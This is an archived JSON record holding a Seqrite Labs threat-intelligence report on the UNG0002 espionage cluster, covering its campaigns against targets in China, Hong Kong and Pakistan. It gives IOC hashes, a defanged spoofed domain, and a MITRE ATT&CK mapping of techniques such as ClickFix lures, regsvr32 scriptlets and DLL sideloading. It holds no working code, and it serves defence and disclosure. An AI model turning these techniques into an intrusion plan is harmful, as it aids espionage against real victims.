{ "id": "e0fce519-5e9b-46e7-97ac-c7f436f4911a", "created_at": "2026-04-06T00:19:24.444578Z", "updated_at": "2026-04-10T13:12:13.93229Z", "deleted_at": null, "sha1_hash": "b46dc03afdc84aaf35f9d364fa7636547e22c462", "title": "UNG0002: Regional Threat Operations Tracked Across Multiple Asian Jurisdictions", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 397593, "plain_text": "UNG0002: Regional Threat Operations Tracked Across Multiple\r\nAsian Jurisdictions\r\nBy Subhajeet Singha\r\nPublished: 2025-07-16 · Archived: 2026-04-05 15:31:32 UTC\r\nOverview\r\nSeqrite Labs APT-Team has identified and tracked UNG0002 also known as Unknown Group 0002, a bunch of\r\nespionage-oriented operations which has been grouped under the same cluster conducting campaigns across\r\nmultiple Asian jurisdictions including China, Hong Kong, and Pakistan. This threat entity demonstrates a strong\r\npreference for using shortcut files (LNK), VBScript, and post-exploitation tools such as Cobalt Strike and\r\nMetasploit, while consistently deploying CV-themed decoy documents to lure victims.\r\nThe cluster’s operations span two major campaigns: Operation Cobalt Whisper (May 2024 – September 2024)\r\nand Operation AmberMist (January 2025 – May 2025). During Operation Cobalt Whisper, 20 infection chains\r\nwere observed targeting defense, electrotechnical engineering, and civil aviation sectors. The more recent\r\nOperation AmberMist campaign has evolved to target gaming, software development, and academic institutions\r\nwith improved lightweight implants including Shadow RAT, Blister DLL Implant, and INET RAT.\r\nIn the recent operation AmberMist, the threat entity has also abused the ClickFix Technique – a social engineering\r\nmethod that tricks victims into executing malicious PowerShell scripts through fake CAPTCHA verification\r\npages. Additionally, UNG0002 leverages DLL sideloading techniques, particularly abusing legitimate Windows\r\napplications like Rasphone and Node-Webkit binaries to execute malicious payloads.\r\nKey Findings\r\nMulti-Stage Attacks: UNG0002 employs sophisticated infection chains using malicious LNK files,\r\nVBScript, batch scripts, and PowerShell to deploy custom RAT implants including Shadow RAT, INET\r\nRAT, and Blister DLL.\r\nClickFix Social Engineering: The group utilizes fake CAPTCHA verification pages to trick victims into\r\nexecuting malicious PowerShell scripts, notably spoofing Pakistan’s Ministry of Maritime Affairs website.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 1 of 11\n\nAbusing DLL Sideloading: In the recent campaign, consistent abuse of legitimate Windows applications\r\n(Rasphone, Node-Webkit) for DLL sideloading to execute malicious payloads while evading detection.\r\nCV-Themed Decoy Documents: Use of realistic resume documents targeting specific industries, including\r\nfake profiles of game UI designers and computer science students from prestigious institutions.\r\nPersistent Infrastructure: Maintained command and control infrastructure with consistent naming\r\npatterns and operational security across multiple campaigns spanning over a year.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 2 of 11\n\nTargeted Industry Focus: Systematic targeting of defense, electrotechnical engineering, energy, civil\r\naviation, academia, medical institutions, cybersecurity researchers, gaming, and software development\r\nsectors.\r\nAttribution Challenges: UNG0002 represents an evolving threat cluster that demonstrates high\r\nadaptability by mimicking techniques from other threat actor playbooks to complicate attribution efforts,\r\nwith Seqrite Labs assessing with high confidence that the group originates from South-East Asia and\r\nfocuses on espionage activities. As more intelligence becomes available, associated campaigns may be\r\nexpanded or refined in the future.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 3 of 11\n\nSummary\r\nUNG0002 represents a sophisticated and persistent threat entity from South Asia that has maintained consistent\r\noperations targeting multiple Asian jurisdictions since at least May 2024. The group demonstrates high\r\nadaptability and technical proficiency, continuously evolving their toolset while maintaining consistent tactics,\r\ntechniques, and procedures.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 4 of 11\n\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 5 of 11\n\nThe threat actor’s focus on specific geographic regions (China, Hong Kong, Pakistan) and targeted industries\r\nsuggests a strategic approach to intelligence gathering AKA classic espionage related activities. Their use of\r\nlegitimate-looking decoy documents, social engineering techniques, and pseudo-advanced evasion methods\r\nindicates a well-resourced and experienced operation.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 6 of 11\n\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 7 of 11\n\nUNG0002 demonstrates consistent operational patterns across both Operation Cobalt Whisper and Operation\r\nAmberMist, maintaining similar infrastructure naming conventions, payload delivery mechanisms, and target\r\nselection criteria. The group’s evolution from using primarily Cobalt Strike and Metasploit frameworks to\r\ndeveloping custom implants like Shadow RAT, INET RAT, and Blister DLL indicates their persistent nature.\r\nNotable technical artifacts include PDB paths revealing development environments such as C:\\Users\\The\r\nFreelancer\\source\\repos\\JAN25\\mustang\\x64\\Release\\mustang.pdb for Shadow RAT and\r\nC:\\Users\\Shockwave\\source\\repos\\memcom\\x64\\Release\\memcom.pdb for INET RAT, indicating potential code\r\nnames “Mustang” and “ShockWave” which indicate the mimicry of already-existing threat groups. An in-depth\r\ntechnical analysis of the complete infection chains and detailed campaign specifics can be found in our\r\ncomprehensive whitepaper.\r\nConclusion\r\nAttributing threat activity to a specific group is always a complex task. It requires detailed analysis across several\r\nareas, including targeting patterns, tactics and techniques (TTPs), geographic focus, and any possible slip-ups in\r\noperational security. UNG0002 is an evolving cluster that Seqrite Labs is actively monitoring. As more\r\nintelligence becomes available, we may expand or refine the associated campaigns. Based on our current\r\nfindings, we assess with high confidence that this group originates from South-East Asia and demonstrates a high\r\nlevel of adaptability — often mimicking techniques seen in other threat actor playbooks to complicate attribution\r\nfocusing on espionage. We also, appreciate other researchers in the community, like malwarehunterteam for\r\nhunting these campaigns.\r\nIOCs\r\nNon-PE [Script-Based Files, Shortcut, C2-Config, Encrypted Shellcode blobs]\r\nFile Type Hash (SHA-256)\r\nLNK (Shortcut) 4ca4f673e4389a352854f5feb0793dac43519ade8049b5dd9356d0cbe0f06148\r\n55dc772d1b59c387b5f33428d5167437dc2d6e2423765f4080ee3b6a04947ae9\r\n4b410c47465359ef40d470c9286fb980e656698c4ee4d969c86c84fbd012af0d\r\nSCT (Scriptlet) c49e9b556d271a853449ec915e4a929f5fa7ae04da4dc714c220ed0d703a36f7\r\nVBS (VBScript) ad97b1c79735b1b97c4c4432cacac2fce6316889eafb41a0d97f2b0e565ee850\r\nc722651d72c47e224007c2111e0489a028521ccdf5331c92e6cd9cfe07076918\r\n2140adec9cde046b35634e93b83da4cc9a8aa0a71c21e32ba1dce2742314e8dc\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 8 of 11\n\nBatch Script (.bat) a31d742d7e36fefed01971d8cba827c71e69d59167e080d2f551210c85fddaa5\r\nPowerShell (.ps1) a31d742d7e36fefed01971d8cba827c71e69d59167e080d2f551210c85fddaa5\r\nTXT – C2 Config\r\n2df309018ab935c47306b06ebf5700dcf790fff7cebabfb99274fe867042ecf0\r\nb7f1d82fb80e02b9ebe955e8f061f31dc60f7513d1f9ad0a831407c1ba0df87e\r\nShellcode (.dat) 2c700126b22ea8b22b8b05c2da05de79df4ab7db9f88267316530fa662b4db2c\r\nPE – Implants\r\nHash (SHA-256)\r\nMalware\r\nType\r\nNotes\r\nc3ccfe415c3d3b89bde029669f42b7f04df72ad2da4bd15d82495b58ebde46d6\r\nBlister\r\nDLL\r\nImplant\r\nUsed in\r\nOperation\r\nAmberMist,\r\nDLL sideloaded\r\nvia Node-Webkit\r\n4c79934beb1ea19f17e39fd1946158d3dd7d075aa29d8cd259834f8cd7e04ef8\r\nBlister\r\nDLL\r\nImplant\r\nSame family as\r\nabove, possible\r\nvariant\r\n2bdd086a5fce1f32ea41be86febfb4be7782c997cfcb028d2f58fee5dd4b0f8a\r\nINET\r\nRAT\r\nShadow RAT\r\nrewrite with\r\nanti-analysis\r\nand C2\r\nflexibility\r\n90c9e0ee1d74b596a0acf1e04b41c2c5f15d16b2acd39d3dc8f90b071888ac99\r\nShadow\r\nRAT\r\nDeployed via\r\nRasphone with\r\ndecoy and\r\nconfig loader\r\nMITRE ATT\u0026CK\r\nTactic Technique\r\nTechnique\r\nID\r\nObserved Behavior / Example\r\nReconnaissance\r\nSpearphishing for\r\nInformation\r\nT1598.002\r\nUse of job-themed resumes (e.g.,\r\nZhang Wanwan \u0026 Li Mingyue CVs) to\r\ntarget specific sectors.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 9 of 11\n\nResource\r\nDevelopment\r\nDevelop Capabilities T1587\r\nCustom implants: INET RAT (rewrite\r\nof Shadow RAT), use of Blister DLL\r\nloader.\r\nAcquire Infrastructure\r\nT1583.001,\r\nT1583.006\r\nUse of spoofed domains (e.g.,\r\nmoma[.]islamabadpk[.]site); ASN\r\nusage.\r\nInitial Access Spear Phishing Attachment T1566.001\r\nUse of malicious ZIPs with LNKs and\r\nVBS (e.g., 张婉婉简历.zip, 李明月\r\n_CV.pdf.lnk).\r\nDrive-by Compromise\r\n(ClickFix technique)\r\nT1189\r\nMalicious site tricks user into pasting\r\nPowerShell copied to clipboard.\r\nExecution\r\nCommand and Scripting\r\nInterpreter (PowerShell,\r\nVBScript, Batch)\r\nT1059\r\nMulti-stage execution via VBS ➝ BAT\r\n➝ PowerShell.\r\nSigned Binary Proxy\r\nExecution (wscript,\r\nrasphone, regsvr32)\r\nT1218\r\nUse of LOLBINs like wscript.exe,\r\nregsvr32.exe, rasphone.exe for\r\nexecution and sideloading.\r\nScripting (Scriptlets – .sct\r\nfiles)\r\nT1059.005\r\nUse of run.sct via regsvr32 for further\r\npayload execution.\r\nPersistence Scheduled Task/Job T1053.005\r\nTasks like SysUpdater, UtilityUpdater\r\nscheduled for recurring execution.\r\nPrivilege\r\nEscalation\r\nDLL Search Order\r\nHijacking\r\nT1574.001\r\nDLL sideloading via rasphone.exe,\r\nnode-webkit for Shadow RAT, Blister\r\nloader.\r\nDefense Evasion\r\nObfuscated Files or\r\nInformation\r\nT1027\r\nScripts with obfuscation, hex-encoded\r\nC2 configs, junk code in SCTs.\r\nDeobfuscate/Decode Files\r\nor Information\r\nT1140\r\nINET RAT decrypting C2\r\nconfiguration from list.txt.\r\nSoftware Packing\r\n(Shellcode loader)\r\nT1027.002\r\nBlister decrypts and injects shellcode\r\nfrom update.dat using AES.\r\nIndirect Command\r\nExecution\r\nT1202\r\nExecuting SCT through regsvr32,\r\nusing P/Invoke to load DLLs.\r\nCredential\r\nAccess\r\nInput Capture (potential\r\nwithin Shadow/INET RAT)\r\nT1056\r\nRAT capabilities imply possible\r\ncredential theft.\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 10 of 11\n\nDiscovery\r\nSystem Information\r\nDiscovery\r\nT1082\r\nINET RAT collects computer/user\r\nnames upon execution.\r\nCommand \u0026\r\nControl\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nT1071.001\r\nShadow/INET RATs communicate\r\nover HTTP(S).\r\nIngress Tool Transfer T1105\r\nPayloads and decoys downloaded from\r\nexternal servers.\r\nCollection Data from Local System T1005\r\nLikely via RATs for file collection or\r\nclipboard access.\r\nExfiltration\r\nExfiltration Over C2\r\nChannel\r\nT1041\r\nShadow/INET RAT reverse shell\r\nfeatures suggest data tunneling over\r\nsame HTTP channel.\r\nAuthors\r\nSathwik Ram Prakki\r\nSubhajeet Singha\r\nSource: https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nhttps://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://www.seqrite.com/blog/ung0002-espionage-campaigns-south-asia/" ], "report_names": [ "ung0002-espionage-campaigns-south-asia" ], "threat_actors": [ { "id": "535a1a2d-0cc7-4746-bed1-4ab13b6ec979", "created_at": "2024-11-08T02:00:03.970177Z", "updated_at": "2026-04-10T02:00:03.74428Z", "deleted_at": null, "main_name": "Operation Cobalt Whisper", "aliases": [], "source_name": "MISPGALAXY:Operation Cobalt Whisper", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "fa8f111a-5ace-4234-a4f7-07ce2b429606", "created_at": "2026-02-07T02:00:03.663624Z", "updated_at": "2026-04-10T02:00:03.960722Z", "deleted_at": null, "main_name": "UNG0002", "aliases": [], "source_name": "MISPGALAXY:UNG0002", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434764, "ts_updated_at": 1775826733, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b46dc03afdc84aaf35f9d364fa7636547e22c462.pdf", "text": "https://archive.orkl.eu/b46dc03afdc84aaf35f9d364fa7636547e22c462.txt", "img": "https://archive.orkl.eu/b46dc03afdc84aaf35f9d364fa7636547e22c462.jpg" } }